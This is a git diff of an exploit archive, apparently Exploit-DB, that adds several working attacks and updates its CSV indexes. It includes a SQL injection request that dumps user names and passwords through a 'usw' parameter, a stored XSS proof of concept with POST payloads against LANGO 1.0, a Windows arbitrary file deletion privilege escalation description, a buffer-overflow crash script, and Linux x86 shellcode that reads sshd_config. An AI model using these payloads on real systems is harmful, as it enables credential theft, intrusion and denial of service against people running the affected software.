+# 341 success: function(data) + +GET /[PATH]/chat.php?action=chatname&usw=-%27++uNiOn+sElecT++(seLEcT(@x)FRom(SElecT(@x:=0x00)%20,(sELeCt(@x)fRom(f_user)whERe(@x)In(@x:=conCat(0x20,@x,0x557365726e616d653a20,userName,0x3c62723e,0x506173733a20,userPassword,0x3c62723e))))x)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=io5hsssef7l7nich1si2gk99k5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Wed, 23 Oct 2018 00:12:37 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 148 +Keep-Alive: timeout=5, max=1 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45672.txt b/exploits/php/webapps/45672.txt new file mode 100644 index 000000000..d144fd75b --- /dev/null +++ b/exploits/php/webapps/45672.txt @@ -0,0 +1,48 @@ +# Exploit Title: LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting +# Date: 2018-10-16 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: http://pokkho.com/lango/ +# Software Link : http://pokkho.com/lango/auth/login +# Software : LANGO - Codeigniter Multilingual Script +# Version : 1.0 +# Vulernability Type : Code Injection +# Vulenrability : HTML Injection and Stored XSS +# CVE : CVE-2018-18416 + +# LANGO Codeigniter Multilingual Script 1.0 has XSS in the input and upload sections, as demonstrated by the +# site_name parameter to the admin/settings/update URI. + +# HTTP POST Request : + +POST /lango/admin/settings/update HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://TARGET/lango/admin/settings +Content-Type: multipart/form-data; boundary=---------------------------180989082911182658591910516947 +Content-Length: 3150615 +Cookie: csrf_cookie_name=4eeae5fca11e4ae108d667b67b52a0b3; ci_session=7ghu11a49n5ethf596t6g1ec5kfscncp +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="site_name" + +">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="site_title" + +">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="keywords" + +Multilanguage ,Codeigniter Multilanguage Script,">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="description" + +">

Ismail Tasdelen

+-----------------------------180989082911182658591910516947 +Content-Disposition: form-data; name="photo1"; filename="\">.jpg" +Content-Type: image/jpeg \ No newline at end of file diff --git a/exploits/windows/local/45675.md b/exploits/windows/local/45675.md new file mode 100644 index 000000000..1ede26a0b --- /dev/null +++ b/exploits/windows/local/45675.md @@ -0,0 +1,17 @@ +Bug description: + +`RpcDSSMoveFromSharedFile(handle,L"token",L"c:\\blah1\\pci.sys");` + +This function exposed over alpc, has a arbitrary delete vuln. + +Hitting the timing was pretty annoying. But my PoC will keep rerunning until c:\windows\system32\drivers\pci.sys is deleted. + +I believe it's impossible to hit the timing on a single core VM. I was able to trigger it using 4 cores on my VM. (Sadly I wasn't able to use OPLOCKS with this particular bug) + +Root cause is basically just a delete without impersonation because of an early revert to self. Should be straight forward to fix it... + +Exploitation wise... you either try to trigger DLL hijacking issues in 3rd party software.. or delete temp files used by a system service in c:\windows\temp and hijack them and hopefully do some evil stuff. + + +EDB Note ~ Source: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-1.rar +EDB Note ~ Binary: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45675-2.exe \ No newline at end of file diff --git a/exploits/windows_x86/dos/45670.txt b/exploits/windows_x86/dos/45670.txt new file mode 100644 index 000000000..9d052ceee --- /dev/null +++ b/exploits/windows_x86/dos/45670.txt @@ -0,0 +1,27 @@ +# Exploit Title: ADULT FILTER 1.0 - Denial of Service (PoC) +# Date: 2018-10-28 +# Exploit Author: Beren Kuday GÖRÃœN +# Vendor Homepage: http://www.armcode.com/adult-filter/ +# Software Link: http://www.armcode.com/downloads/adult-filter.exe +# Version: 1.0 (Build 2007-Mar-12) +# Tested on OS: Windows XP Professional sp3 (ENG) + +# Steps to Reproduce: Run the python3 exploit script, it will create a new +# file with the name "boom_for_Adult_Filter.txt". Copy the content of the +# new file "boom_for_Adult_Filter.txt". Now start the program. When you +# open the program, select 'Options >> Black Domain List ...' from the +# menu item. In the window that opens, enter the text in the file you +# created with python3 script the 'Add the domain list' section. +# Press the 'Add' button and then press the 'OK' button. +# And see a crash! + +buffer = "A" * 4500 + +try: + file = open("boom_for_Adult_Filter.txt","w") + file.write(buffer) + file.close() + print("[*] Ready for Denial of Service") + +except: + print("[*] Error: Failed to create file") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 79cbdf345..045a0429b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6156,6 +6156,7 @@ id,file,description,date,author,type,platform,port 45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple, 45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios, 45658,exploits/windows/dos/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Denial of Service (PoC)",2018-10-23,hyp3rlinx,dos,windows, +45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10048,6 +10049,7 @@ id,file,description,date,author,type,platform,port 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, 45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 45660,exploits/windows/local/45660.py,"Microsoft Windows 10 - Local Privilege Escalation (UAC Bypass)",2018-10-22,"Fabien DROMAS",local,windows, +45675,exploits/windows/local/45675.md,"Microsoft Data Sharing - Local Privilege Escalation (PoC)",2018-10-23,SandboxEscaper,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -10296,7 +10298,7 @@ id,file,description,date,author,type,platform,port 730,exploits/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution",2004-12-28,ShredderSub7,remote,windows, 733,exploits/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,remote,windows,42 734,exploits/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,remote,windows,139 -745,exploits/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000 +745,exploits/multiple/remote/745.pl,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,remote,multiple,10000 746,exploits/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,remote,multiple,10000 750,exploits/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,remote,windows,6101 753,exploits/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,remote,windows, @@ -16888,6 +16890,7 @@ id,file,description,date,author,type,platform,port 45611,exploits/windows/remote/45611.c,"NoMachine < 5.3.27 - Remote Code Execution",2018-10-15,hyp3rlinx,remote,windows, 45629,exploits/hardware/remote/45629.txt,"FLIR AX8 Thermal Camera 1.32.16 - Hard-Coded Credentials",2018-10-17,LiquidWorm,remote,hardware, 45638,exploits/linux/remote/45638.py,"libSSH - Authentication Bypass",2018-10-18,"Dayanç Soyadlı",remote,linux, +45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40177,6 +40180,14 @@ id,file,description,date,author,type,platform,port 45659,exploits/php/webapps/45659.txt,"SIM-PKH 2.4.1 - Arbitrary File Upload",2018-10-23,"Ihsan Sencan",webapps,php, 45661,exploits/windows/webapps/45661.txt,"ServersCheck Monitoring Software 14.3.3 - 'id' SQL Injection",2018-10-23,hyp3rlinx,webapps,windows, 45662,exploits/php/webapps/45662.txt,"School ERP Pro+Responsive 1.0 - Arbitrary File Download",2018-10-23,"Ihsan Sencan",webapps,php, -45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php, -45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php, -45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows, +45663,exploits/php/webapps/45663.txt,"School ERP Pro+Responsive 1.0 - 'fid' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,80 +45664,exploits/php/webapps/45664.txt,"SIM-PKH 2.4.1 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,php,80 +45665,exploits/windows/webapps/45665.txt,"MGB OpenSource Guestbook 0.7.0.2 - 'id' SQL Injection",2018-10-23,"Ihsan Sencan",webapps,windows,80 +45666,exploits/php/webapps/45666.txt,"SG ERP 1.0 - 'info' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php,80 +45667,exploits/php/webapps/45667.txt,"Fifa Master XLS 2.3.2 - 'usw' SQL Injection",2018-10-24,"Ihsan Sencan",webapps,php, +45668,exploits/aspx/webapps/45668.txt,"Axioscloud Sissiweb Registro Elettronico 7.0.0 - 'Error_desc' Cross-Site Scripting",2018-10-24,"Dino Barlattani",webapps,aspx, +45672,exploits/php/webapps/45672.txt,"LANGO Codeigniter Multilingual Script 1.0 - Cross-Site Scripting",2018-10-24,"Ismail Tasdelen",webapps,php, +45673,exploits/java/webapps/45673.py,"Apache OFBiz 16.11.04 - XML External Entity Injection",2018-10-24,"Jamie Parfet",webapps,java, +45676,exploits/hardware/webapps/45676.md,"D-Link Routers - Command Injection",2018-10-12,"Blazej Adamczyk",webapps,hardware, +45677,exploits/hardware/webapps/45677.md,"D-Link Routers - Plaintext Password",2018-10-12,"Blazej Adamczyk",webapps,hardware, +45678,exploits/hardware/webapps/45678.md,"D-Link Routers - Directory Traversal",2018-10-12,"Blazej Adamczyk",webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 827c22a47..8df0ac196 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -920,3 +920,4 @@ id,file,description,date,author,type,platform 45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips +45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/45669.c b/shellcodes/linux_x86/45669.c new file mode 100644 index 000000000..f208b7fb1 --- /dev/null +++ b/shellcodes/linux_x86/45669.c @@ -0,0 +1,52 @@ +/* +# Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes +# Author: Goutham Madhwaraj +# Date: 2018-10-22 +# Tested on: i686 GNU/Linux +# Shellcode Length: 44 +# ShoutOut - BarrierSec +# gcc -fno-stack-protector -z execstack loader-bind.c -o + +Disassembly of section .text: + +08048080 <_start>: + 8048080: 31 c0 xor eax,eax + 8048082: 50 push eax + 8048083: 68 2f 63 61 74 push 0x7461632f + 8048088: 68 2f 62 69 6e push 0x6e69622f + 804808d: 89 e3 mov ebx,esp + 804808f: 50 push eax + 8048090: 68 6e 66 69 67 push 0x6769666e + 8048095: 68 64 5f 63 6f push 0x6f635f64 + 804809a: 68 2f 73 73 68 push 0x6873732f + 804809f: 68 2f 73 73 68 push 0x6873732f + 80480a4: 68 2f 65 74 63 push 0x6374652f + 80480a9: 89 e1 mov ecx,esp + 80480ab: 6a 00 push 0x0 + 80480ad: 51 push ecx + 80480ae: 53 push ebx + 80480af: 89 e1 mov ecx,esp + 80480b1: 50 push eax + 80480b2: 89 e2 mov edx,esp + 80480b4: b0 0b mov al,0xb + 80480b6: cd 80 int 0x80 + +===============POC by Goutham Madhwaraj========================= +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x50\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x50\x68\x6e\x66\x69\x67\x68\x64\x5f\x63\x6f\x68\x2f\x73\x73\x68\x68\x2f\x73\x73\x68\x68\x2f\x65\x74\x63\x89\xe1\x6a\x00\x51\x53\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80"; + +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file